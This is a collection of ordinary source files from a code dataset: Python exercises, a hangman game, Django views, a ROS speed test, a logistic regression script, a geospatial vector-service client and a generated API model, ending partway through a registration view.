+{"seq_id":"561758466","text":"\n\"\"\"\nFaça um programa que tenha uma função chamada área(), que \nreceba as dimesões de um terreno retangular(largura e comprimento) e \nmostre a área do terreno\n\"\"\"\n\ndef area(a, b):\n s = a * b\n print(f'A área de um terreno {a}x{b} é de {s}m².')\n\n\nprint('Controle de Terrenos:^8')\nprint('-'*30)\n\na = float(input('LARGURA (m): '))\nb = float(input('COMPRIMENTO (m): '))\narea(a, b)\n\n","sub_path":"Exercicio #96.py","file_name":"Exercicio #96.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"247839257","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nimport random\n\n\nclass Room:\n\n def __init__(self, title, desc, itemDrop):\n self.title = title\n self.desc = desc\n self.droppedItem = None\n self.itemDrop = itemDrop\n self.n_to = None\n self.e_to = None\n self.s_to = None\n self.w_to = None\n\n def __str__(self):\n return f\"\\n\\n--{self.title}-- \\n{self.desc} \\n\"\n \n","sub_path":"src/days-2-4-adv/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"438578685","text":"from google.appengine.api import users\nfrom google.appengine.ext import ndb\n\n# Every data store has a primary key called an entity key\n# unlike a primary key in relational databases, entity keys\n# are permanent and can only be set when the entity is created. \n# it is unique across all entities in the system\n# App can set the key name (only one component of the key) to \n# an arbitrary value\n\nclass UserPrefs(ndb.Model):\n\ttz_offset = ndb.FloatProperty(default=0.0)\n\tuser = ndb.UserProperty(auto_current_user_add=True)\n\n# gets the userprefs and determines the user id\n# constructs the data store key for an entity of the kind\n# UserPrefs with a key name equivalent to the user ID.\n# if the entity exists it returns the object otherwise\n# it creates the object with default settings and a key\n# name corresponding to the user\n# put must be invoked to save the new key\ndef get_userprefs(user_id=None):\n\tif not user_id:\n\t\tuser = users.get_current_user()\n\t\tif not user:\n\t\t\treturn None\n\t\tuser_id = user.user_id()\n\n\tkey = ndb.Key('UserPrefs', user_id)\n\tuserprefs = key.get()\n\tif not userprefs:\n\t\tuserprefs = UserPrefs(id=user_id)\n\treturn userprefs","sub_path":"cs496-week1-1266/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396039273","text":"\nfrom pagination import paginacija\nfrom parserTrie.findset import *\n\nfrom set import *\nfrom parserTrie.Tree import *\nimport fnmatch, re\nfrom ucitavanePodata import popunjavanjeStruktura\n\n# function to get unique values\ndef unique(list1):\n # intilize a null list\n unique_list = []\n\n # traverse for all elements\n for x in list1:\n # check if exists in unique_list or not\n if x not in unique_list:\n unique_list.append(x)\n return unique_list\n\ndef pretraga(unesene_reci,stablo,unos):\n globalResultSet = Set('')\n skupoviHTMLstranica = []\n if 'and' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('and')\n unesene_reci.remove('and')\n \"\"\"\n Preko indeksa znam koja 2 elementa iz liste, trebaju obavezno da budu prilikom pretrage.\n t1,t2 - Cuvamo dvojku [uspesnost_trazenja, broj_pojavljivanja]\n \"\"\"\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n\n # for e in t1[2]:\n # print(e)\n\n if (t1[0] == True and t2[0] == True):\n #set1 = nadjiSet(unos, unesene_reci[index - 1])\n #set2 = nadjiSet(unos, unesene_reci[index])\n\n set1 = t1[2]\n set2 = t2[2]\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n\n #resultSet = set1.intersection(set2)\n resultSet = set1 & set2\n globalResultSet = resultSet\n #paginacija(resultSet)\n else:\n print(\"Error: Nisu se obe reci pojavile!!\")\n else:\n print(\"Error: Nije unesena validna pretraga sa and operatorom\")\n elif 'not' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('not')\n unesene_reci.remove('not')\n\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n\n # set1 = nadjiSet(unos, unesene_reci[index - 1])\n # set2 = nadjiSet(unos, unesene_reci[index])\n set1 = t1[2]\n set2 = t2[2]\n\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n resultSet = set1 - set2\n #resultSet = set1.complement(set2)\n globalResultSet = resultSet\n\n #paginacija(resultSet)\n else:\n print(\"Error: Nije unesena validna pretraga sa not operatorom\")\n elif 'or' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('or')\n unesene_reci.remove('or')\n\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n if (t1[0] == True or t2[0] == True):\n # set1 = nadjiSet(unos,unesene_reci[index-1])\n # set2 = nadjiSet(unos,unesene_reci[index])\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n set1 = t1[2]\n set2 = t2[2]\n\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n\n resultSet = set1.union(set2)\n globalResultSet = resultSet\n else:\n print(\"Error: Obe reci se uopste nisu pojavile!!\")\n else:\n print(\"Error: Nije unesena validna pretraga sa or operatorom\")\n\n else:\n resultSet = Set('')\n pojavljivane_reci = []\n unesene_reci = unique(unesene_reci)\n for i in range(len(unesene_reci)):\n t = find_prefix(stablo.root, unesene_reci[i])\n if (t[0] == True):\n pojavljivane_reci.append(unesene_reci[i])\n\n #set = nadjiSet(unos,unesene_reci[i])\n set = t[2]\n\n skupoviHTMLstranica.append(set)\n resultSet = resultSet | set\n #resultSet = resultSet.union(set)\n\n globalResultSet = resultSet\n\n return globalResultSet\n\ndef unosPutanje():\n unos = ''\n # petlja ce da se izvrsava sve dok korisnik ne unese nesto\n while unos == '':\n regexPattern1 = 
fnmatch.translate('[A-Z]:\\*')\n regexPattern2 = fnmatch.translate('/*')\n # Kompajlujemo objekat na kom kasnije mozemo da vrsimo regex metode\n regexObj1 = re.compile(regexPattern1)\n regexObj2 = re.compile(regexPattern2)\n print(\"Unesite putanju korenskog direktorijuma u okviru kojeg zelite da pretrazujete:\")\n unos = input()\n if unos != '': # Mora prvo ova provera zato sto regex.match puca ako mu se prosledi prazan string\n if regexObj1.match(unos) or regexObj2.match(unos):\n print(\"Please wait...\")\n # stablo = loadTrieViaHTML(unos)\n stablo, g, setSvihDatoteka, recnikStranicaReci,dokumentiKojiImajuLinkKaDokumentu,bekLinkovi = popunjavanjeStruktura(unos)\n # g = loadGraphFromParser(unos)\n\n else:\n print(\"Putanja nije validna!\")\n unos = ''\n return stablo,g,setSvihDatoteka,recnikStranicaReci, unos, dokumentiKojiImajuLinkKaDokumentu, bekLinkovi\n\ndef unosProstePretrage():\n unosUpit = ''\n # petlja ce da se izvrsava sve dok korisnik ne unese nesto\n while unosUpit == '':\n # Kompajlujemo objekat na kom kasnije mozemo da vrsimo regex metode\n regexObj111 = re.compile(\"(([\\w]+\\s){1}(and|or|not){1}(\\s[\\w]+){1})|([\\w\\s]+)\")\n\n unosUpit = input(\"Unesite pretragu:\")\n unosUpit = unosUpit.strip().lower()\n if unosUpit != '': # Mora prvo ova provera zato sto regex.match puca ako mu se prosledi prazan string\n if regexObj111.fullmatch(unosUpit):\n print(\"Please wait...\")\n else:\n print(\"Niste uneli validnu pretragu!\")\n unosUpit = ''\n\n unesene_reci = unosUpit.split()\n return unesene_reci","sub_path":"SearchEngine/unos.py","file_name":"unos.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
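For reference, the query grammar enforced by unosProstePretrage boils down to the compiled pattern above; a quick illustration:

import re

pattern = re.compile("(([\w]+\s){1}(and|or|not){1}(\s[\w]+){1})|([\w\s]+)")
print(bool(pattern.fullmatch("python and java")))  # True: single binary-operator query
print(bool(pattern.fullmatch("grep regex trie")))  # True: plain multi-word query
print(bool(pattern.fullmatch("")))                 # False: empty input is rejected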
+{"seq_id":"188957808","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom topic.models import Topic\nfrom tools.logging_dec import logging_check\nfrom message.models import Message\n\n\n# 异常码 10400-10499\n\n# Create your views here.\n@logging_check\ndef message_view(request, topic_id):\n user = request.myuser\n json_str = request.body\n json_obj = json.loads(json_str)\n content = json_obj['content']\n parent_id = json_obj.get('parent_id', 0)\n try:\n topic = Topic.objects.get(id=topic_id)\n except Exception as e:\n result = {'code': 10400, 'error': 'The topic is not existed'}\n return JsonResponse(result)\n\n Message.objects.create(topic=topic, content=content, parent_message=parent_id, publisher=user)\n return JsonResponse({'code': 200})\n","sub_path":"笔记/Day01/dadalog/message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"542476590","text":"#!/usr/bin/env python\n#\n#\n##############################################################################\n# Imports\n##############################################################################\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2018, Soy Robotics, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Soy Robotics, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Author: Carl Zhang\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom math import copysign, sqrt, pow\n\nclass LinearSpeed(object):\n def __init__(self, cmd_vel_topic):\n self.cmd_vel_publisher = rospy.Publisher(cmd_vel_topic, Twist, queue_size=10)\n self.rate = rospy.Rate(50)\n\n self.ok = True\n self._stop = False\n self._running = False\n\n self._linear_speed = 0.2\n\n def init(self, linear_speed):\n self._linear_speed = linear_speed\n\n def shutdown(self):\n self.stop()\n while self._running:\n self.rate.sleep()\n rospy.loginfo(\"Stopping the robot, Test finished...\")\n self.cmd_vel_publisher.unregister()\n\n def change_topic(self, cmd_vel_topic):\n self.cmd_vel_publisher = rospy.Publisher(cmd_vel_topic, Twist, queue_size=10)\n\n def stop(self):\n self._stop = True\n\n def command(self, twist):\n if self._stop or rospy.is_shutdown():\n return False\n self.cmd_vel_publisher.publish(twist)\n self.rate.sleep()\n return True\n\n def go(self):\n twist = Twist()\n while self.ok:\n twist.linear.x = self._linear_speed\n if not self.command(twist):\n return False\n return True\n\n def execute_speed(self):\n if self._running:\n rospy.logerr(\"Sleo TestSuite: already executing linear error test, ignoring the request\")\n return\n self._stop = False\n self._running = True\n while True:\n if not self.go() :\n break\n\n self._running = False\n if not rospy.is_shutdown():\n cmd = Twist()\n cmd.linear.x = 0.0\n 
self.cmd_vel_publisher.publish(cmd)\n\n","sub_path":"sleo_desktop/sleo_testsuite/src/sleo_testsuite/linear_speed.py","file_name":"linear_speed.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
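A minimal usage sketch for the class above; the node name, topic, and speed value are assumptions:

import rospy

if __name__ == '__main__':
    rospy.init_node('linear_speed_test')
    test = LinearSpeed('/cmd_vel')    # publishes geometry_msgs/Twist here
    test.init(0.3)                    # target linear speed in m/s
    rospy.on_shutdown(test.shutdown)  # stops the robot cleanly on Ctrl+C
    test.execute_speed()              # drives forward until stop() is called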
+{"seq_id":"50922588","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom odoo import api, models, _\nfrom odoo.tools.safe_eval import safe_eval\n#\n# Use period and Journal for selection or resources\n#\n\n\nclass ir_needaction_mixin(models.AbstractModel):\n _name = 'ir.needaction_mixin'\n _needaction = True\n\n #------------------------------------------------------\n # Addons API\n #------------------------------------------------------\n\n def _needaction_domain_get(self, cr, uid, context=None):\n \"\"\" Returns the domain to filter records that require an action\n :return: domain or False is no action\n \"\"\"\n return False\n\n #------------------------------------------------------\n # \"Need action\" API\n #------------------------------------------------------\n\n def _needaction_count(self, cr, uid, domain=None, context=None):\n \"\"\" Get the number of actions uid has to perform. \"\"\"\n dom = self._needaction_domain_get(cr, uid, context=context)\n if not dom:\n return 0\n res = self.search(cr, uid, (domain or []) + dom, limit=100, order='id DESC', context=context)\n return len(res)\n","sub_path":"badge_menu/models/ir_needaction.py","file_name":"ir_needaction.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"96744162","text":"\"\"\"\nHangman.\n\nAuthors: Hannah Meisner, Alyssa Taylor, Kaitlyn Wike.\n\"\"\" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.\n\n# DONE: 2. Implement Hangman using your Iterative Enhancement Plan.\n\n####### Do NOT attempt this assignment before class! #######\n\nimport random\n\n\ndef main():\n #Welcome\n print('HELLO!!')\n name = str(input('Whats your name: '))\n length = int(input('Enter MAXIMUM length for secret word:'))\n\n correct = ''\n for k in range(length):\n correct = correct + '-'\n\n tries = int(input('How many guesses do you want?'))\n triesLeft = tries\n word = random_word(length)\n guessedLetters = ''\n\n while triesLeft > 0:\n letter = guess(guessedLetters)\n guessedLetters = guessedLetters + letter\n triesLeft = checker(letter, word, triesLeft)\n correct = known(word, correct, letter)\n print(correct)\n if correct == word:\n print(\"You got it\", name + \"! Enjoy your prize of... nothing!\")\n triesLeft = 0\n\n if correct != word:\n print(\"You lose\", name + \"! Outsmarted by a computer...\")\n\n print(\"The word was:\", word)\n\n\ndef random_word(length):\n with open('words.txt') as f:\n f.readline()\n string = f.read()\n words = string.split()\n\n while True:\n word = words[random.randrange(0, len(words))]\n if len(word) <= length:\n break\n\n return word\n\n\ndef guess(guessedLetters):\n letter = str(input('Enter your guess:'))\n while letter in guessedLetters:\n print(\"You already guessed that letter. Try again!\")\n letter = letter = str(input('Enter your guess:'))\n\n return letter\n\ndef checker(letter, word, triesLeft):\n if letter in word:\n print('Guess Correct! You have', triesLeft, 'guess(es) remaining.')\n else:\n triesLeft = triesLeft - 1\n print('Incorrect! You have', triesLeft, 'guess(es) remaining.')\n\n return triesLeft\n\n\ndef known(word, correct, letter):\n new_correct = ''\n for k in range(len(word)):\n if correct[k] != '-':\n new_correct = new_correct + correct[k]\n elif word[k] == letter:\n new_correct = new_correct + word[k]\n else:\n new_correct = new_correct + '-'\n\n correct = new_correct\n return correct\nmain()","sub_path":"src/m1_hangman.py","file_name":"m1_hangman.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"550199918","text":"import os\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import fbeta_score\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ntrain_file = os.path.join('data', 'train.tsv')\ntest_file = os.path.join('data', 'test.tsv')\nresults_file = os.path.join('data', 'results.tsv')\noutput_file = os.path.join('data', 'out.tsv')\n\ndf_test_names = ['Date',\n 'Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']\n\ndf_test = pd.read_csv(test_file, sep='\\t', names=df_test_names)\ndf_test = df_test.dropna()\n\ndf_train_names = ['Occupancy',\n 'Date',\n 'Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']\n\ndf_train = pd.read_csv(train_file, sep='\\t', names=df_train_names)\ndf_train = df_train.dropna()\n\n# one variable\nx_train = df_train[['Light']]\n# x_train = df_train[['CO2']]\ny_train = df_train.Occupancy\n\nx_test = df_test[['Light']]\n# x_test = df_test[['CO2']]\ny_test = pd.read_csv(results_file, sep='\\t', names=['Occupancy']).Occupancy\n\n\nl_reg = LogisticRegression()\nl_reg.fit(x_train, y_train)\ny_train_pred = l_reg.predict(x_train)\ny_test_pred = l_reg.predict(x_test)\n\ntrain_conf_matrix = confusion_matrix(y_train, y_train_pred)\ntest_conf_matrix = confusion_matrix(y_test, y_test_pred)\ntp_train, fp_train, fn_train, tn_train = train_conf_matrix.ravel()\ntp_test, fp_test, fn_test, tn_test = test_conf_matrix.ravel()\n\n# train_accuracy = accuracy_score(y_train, y_train_pred)\n# train_accuracy = sum(y_train == y_train_pred) / len(y_train_pred)\ntrain_accuracy = (tp_train+tn_train) / (sum(train_conf_matrix.ravel()))\ntrain_sensitivity = tp_train / (tp_train + fn_train)\ntrain_specificity = tn_train / (fp_train + tn_train)\n\n# test_accuracy = accuracy_score(y_test, y_test_pred)\n# test_accuracy = sum(y_test == y_test_pred) / len(y_test_pred)\ntest_accuracy = accuracy_score(y_test, y_test_pred)\ntest_sensitivity = tp_test / (tp_test + fn_test)\ntest_specificity = tn_test / (fp_test + tn_test)\n\n# all variables\nx_train_all = df_train[['Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']]\nx_test_all = df_test[['Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']]\n\nl_reg_all = LogisticRegression()\nl_reg_all.fit(x_train_all, y_train)\ny_train_pred_all = l_reg_all.predict(x_train_all)\ny_test_pred_all = l_reg_all.predict(x_test_all)\n\ntrain_conf_matrix_all = confusion_matrix(y_train, y_train_pred_all)\ntest_conf_matrix_all = confusion_matrix(y_test, y_test_pred_all)\n\ntp_train_all, fp_train_all, fn_train_all, tn_train_all = \\\n train_conf_matrix_all.ravel()\n\ntp_test_all, fp_test_all, fn_test_all, tn_test_all = \\\n test_conf_matrix_all.ravel()\n\ntrain_accuracy_all = (tp_train_all+tn_train_all) \\\n / (sum(train_conf_matrix_all.ravel()))\ntrain_sensitivity_all = tp_train_all / (tp_train_all + fn_train_all)\ntrain_specificity_all = tn_train_all / (fp_train_all + tn_train_all)\n\ntest_accuracy_all = accuracy_score(y_test, y_test_pred_all)\ntest_sensitivity_all = tp_test_all / (tp_test_all + fn_test_all)\ntest_specificity_all = tn_test_all / (fp_test_all + tn_test_all)\n\npd.DataFrame(y_test_pred).to_csv(output_file, index=False, header=False)\n\n# f score\n# beta value for a: <1 precision more important\n# beta value for b: >1 recall more important\n\n# one var\nf1_train = f1_score(y_train, 
y_train_pred)\nf1_test = f1_score(y_test, y_test_pred)\nf1_beta_a_test = fbeta_score(y_test, y_test_pred, beta=0.2)\nf1_beta_b_test = fbeta_score(y_test, y_test_pred, beta=10)\nf1_beta_a_train = fbeta_score(y_train, y_train_pred, beta=0.2)\nf1_beta_b_train = fbeta_score(y_train, y_train_pred, beta=10)\n\n# all var\nf1_train_all = f1_score(y_train, y_train_pred_all)\nf1_test_all = f1_score(y_test, y_test_pred_all)\nf1_beta_a_test_all = fbeta_score(y_test, y_test_pred_all, beta=0.2)\nf1_beta_b_test_all = fbeta_score(y_test, y_test_pred_all, beta=10)\nf1_beta_a_train_all = fbeta_score(y_train, y_train_pred_all, beta=0.2)\nf1_beta_b_train_all = fbeta_score(y_train, y_train_pred_all, beta=10)\n","sub_path":"UCZMZad3_1.py","file_name":"UCZMZad3_1.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
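A quick check of the beta semantics noted in the comments above (beta < 1 favors precision, beta > 1 favors recall); the toy labels are illustrative:

from sklearn.metrics import fbeta_score

y_true = [1, 1, 1, 0, 0]
y_pred = [1, 0, 0, 0, 0]  # precision = 1.0, recall = 1/3
print(fbeta_score(y_true, y_pred, beta=0.2))  # ~0.93, close to precision
print(fbeta_score(y_true, y_pred, beta=10))   # ~0.34, close to recall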
+{"seq_id":"558662239","text":"\"\"\"\nGBDX Vector Services Interface.\n\nContact: nate.ricklin@digitalglobe.com\n\"\"\"\n#from __future__ import absolute_import\nfrom builtins import object\n\nimport requests\nfrom pygeoif import geometry\nfrom geomet import wkt as wkt2geojson\nimport json\n\nfrom gbdxtools.auth import Auth\n\nclass Vectors(object):\n\n def __init__(self, **kwargs):\n ''' Construct the Vectors interface class\n\n Returns:\n An instance of the Vectors interface class.\n '''\n interface = Auth(**kwargs)\n self.gbdx_connection = interface.gbdx_connection\n self.logger = interface.logger\n self.query_url = 'https://vector.geobigdata.io/insight-vector/api/vectors/query/paging'\n self.page_url = 'https://vector.geobigdata.io/insight-vector/api/vectors/paging'\n self.get_url = 'https://vector.geobigdata.io/insight-vector/api/vector/%s/'\n self.create_url = 'https://vector.geobigdata.io/insight-vector/api/vectors'\n\n def create(self,vectors):\n \"\"\"\n Create a vectors in the vector service.\n\n Args:\n vectors: A single geojson vector or a list of geojson vectors. Each looks like:\n {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Point\",\n \"coordinates\": [1.0,1.0]\n },\n \"properties\": {\n \"text\" : \"item text\",\n \"name\" : \"item name\",\n \"item_type\" : \"type\",\n \"ingest_source\" : \"source\",\n \"attributes\" : {\n \"latitude\" : 1,\n \"institute_founded\" : \"2015-07-17\",\n \"mascot\" : \"moth\"\n }\n }\n }\n\n item_type and ingest_source are required.\n\n Returns:\n a list of IDs of the vectors created\n \"\"\"\n if type(vectors) is dict:\n vectors = [vectors]\n\n # validate they all have item_type and ingest_source in properties\n for vector in vectors:\n if not 'properties' in list(vector.keys()):\n raise Exception('Vector does not contain \"properties\" field.')\n\n if not 'item_type' in list(vector['properties'].keys()):\n raise Exception('Vector does not contain \"item_type\".')\n\n if not 'ingest_source' in list(vector['properties'].keys()):\n raise Exception('Vector does not contain \"ingest_source\".')\n\n r = self.gbdx_connection.post(self.create_url, data=json.dumps(vectors))\n r.raise_for_status()\n return r.json()\n\n def create_from_wkt(self, wkt, item_type, ingest_source, **attributes):\n '''\n Create a single vector in the vector service\n\n Args:\n wkt (str): wkt representation of the geometry\n item_type (str): item_type of the vector\n ingest_source (str): source of the vector\n attributes: a set of key-value pairs of attributes\n\n Returns:\n id (str): string identifier of the vector created\n '''\n # verify the \"depth\" of the attributes is single layer\n\n geojson = wkt2geojson.loads(wkt)\n vector = {\n 'type': \"Feature\",\n 'geometry': geojson,\n 'properties': {\n 'item_type': item_type,\n 'ingest_source': ingest_source,\n 'attributes': attributes\n }\n }\n\n return self.create(vector)[0]\n\n\n def get(self, ID, index='vector-web-s'):\n '''Retrieves a vector. Not usually necessary because searching is the best way to find & get stuff.\n\n Args:\n ID (str): ID of the vector object\n index (str): Optional. Index the object lives in. 
defaults to 'vector-web-s'\n\n Returns:\n record (dict): A dict object identical to the json representation of the catalog record\n '''\n\n url = self.get_url % index\n r = self.gbdx_connection.get(url + ID)\n r.raise_for_status()\n return r.json()\n\n\n def query(self, searchAreaWkt, query, count=100, ttl='5m'):\n '''\n Perform a vector services query using the QUERY API\n (https://gbdxdocs.digitalglobe.com/docs/vs-query-list-vector-items-returns-default-fields)\n\n Args:\n searchAreaWkt: WKT Polygon of area to search\n query: Elastic Search query\n count: Maximum number of results to return\n ttl: Amount of time for each temporary vector page to exist\n\n Returns:\n List of vector results\n \n '''\n\n return list(self.query_iteratively(searchAreaWkt, query, count, ttl))\n\n\n def query_iteratively(self, searchAreaWkt, query, count=100, ttl='5m'):\n '''\n Perform a vector services query using the QUERY API\n (https://gbdxdocs.digitalglobe.com/docs/vs-query-list-vector-items-returns-default-fields)\n\n Args:\n searchAreaWkt: WKT Polygon of area to search\n query: Elastic Search query\n count: Maximum number of results to return\n ttl: Amount of time for each temporary vector page to exist\n\n Returns:\n generator of vector results\n \n '''\n\n search_area_polygon = geometry.from_wkt(searchAreaWkt)\n left, lower, right, upper = search_area_polygon.bounds\n\n params = {\n \"q\": query,\n \"count\": count,\n \"ttl\": ttl,\n \"left\": left,\n \"right\": right,\n \"lower\": lower,\n \"upper\": upper\n }\n\n # initialize paging request\n r = self.gbdx_connection.get(self.query_url, params=params)\n r.raise_for_status()\n page = r.json()\n paging_id = page['next_paging_id']\n item_count = int(page['item_count'])\n data = page['data']\n\n for vector in data:\n yield vector\n\n # get vectors from each page\n while paging_id and item_count > 0:\n\n headers = {'Content-Type':'application/x-www-form-urlencoded'}\n data = {\n \"pagingId\": paging_id,\n \"ttl\": ttl\n }\n\n r = self.gbdx_connection.post(self.page_url, headers=headers, data=data)\n r.raise_for_status()\n page = r.json()\n paging_id = page['next_paging_id']\n item_count = int(page['item_count'])\n data = page['data']\n\n for vector in data:\n yield vector\n\n\n\n\n\n\n","sub_path":"gbdxtools/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
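A short usage sketch for create_from_wkt above; it assumes valid GBDX credentials are configured, and the attribute is illustrative:

v = Vectors()
vector_id = v.create_from_wkt('POINT (1.0 1.0)',
                              item_type='test_type',
                              ingest_source='demo',
                              mascot='moth')
print(vector_id)  # string identifier of the newly created vector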
+{"seq_id":"339142769","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass UserList(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, user: List[UserInfo]=None, resource_url: ResourceURL=None): # noqa: E501\n \"\"\"UserList - a model defined in Swagger\n\n :param user: The user of this UserList. # noqa: E501\n :type user: List[UserInfo]\n :param resource_url: The resource_url of this UserList. # noqa: E501\n :type resource_url: ResourceURL\n \"\"\"\n self.swagger_types = {\n 'user': List[UserInfo],\n 'resource_url': ResourceURL\n }\n\n self.attribute_map = {\n 'user': 'user',\n 'resource_url': 'resourceURL'\n }\n\n self._user = user\n self._resource_url = resource_url\n\n @classmethod\n def from_dict(cls, dikt) -> 'UserList':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The UserList of this UserList. # noqa: E501\n :rtype: UserList\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def user(self) -> List[UserInfo]:\n \"\"\"Gets the user of this UserList.\n\n Collection of the zone information list. # noqa: E501\n\n :return: The user of this UserList.\n :rtype: List[UserInfo]\n \"\"\"\n return self._user\n\n @user.setter\n def user(self, user: List[UserInfo]):\n \"\"\"Sets the user of this UserList.\n\n Collection of the zone information list. # noqa: E501\n\n :param user: The user of this UserList.\n :type user: List[UserInfo]\n \"\"\"\n\n self._user = user\n\n @property\n def resource_url(self) -> ResourceURL:\n \"\"\"Gets the resource_url of this UserList.\n\n\n :return: The resource_url of this UserList.\n :rtype: ResourceURL\n \"\"\"\n return self._resource_url\n\n @resource_url.setter\n def resource_url(self, resource_url: ResourceURL):\n \"\"\"Sets the resource_url of this UserList.\n\n\n :param resource_url: The resource_url of this UserList.\n :type resource_url: ResourceURL\n \"\"\"\n if resource_url is None:\n raise ValueError(\"Invalid value for `resource_url`, must not be `None`\") # noqa: E501\n\n self._resource_url = resource_url\n","sub_path":"locationAPI/server/swagger_server/models/user_list.py","file_name":"user_list.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"341751746","text":"from django.shortcuts import render,redirect\r\n\r\nfrom eventapp.forms import UserForm,UserProfileInfoForm\r\n\r\nfrom django.contrib.auth import authenticate, login, logout\r\n\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\n\r\nfrom django.contrib.auth.models import User\r\n\r\nfrom mysite.core.forms import SignUpForm\r\n\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\ndef index(request):\r\n return render(request,'eventapp/index.html')\r\n@login_required\r\ndef special(request):\r\n return HttpResponse(\"You are logged in !\")\r\n@login_required\r\n\r\ndef user_logout(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('index'))\r\n\r\ndef register(request):\r\n registered = False\r\n if request.method == 'POST':\r\n user_form = UserForm(data=request.POST)\r\n profile_form = UserProfileInfoForm(data=request.POST)\r\n if user_form.is_valid() and profile_form.is_valid():\r\n user = user_form.save()\r\n user.set_password(user.password)\r\n user.save()\r\n profile = profile_form.save(commit=False)\r\n profile.user = user\r\n if 'profile_pic' in request.FILES:\r\n print('found it')\r\n profile.profile_pic = request.FILES['profile_pic']\r\n 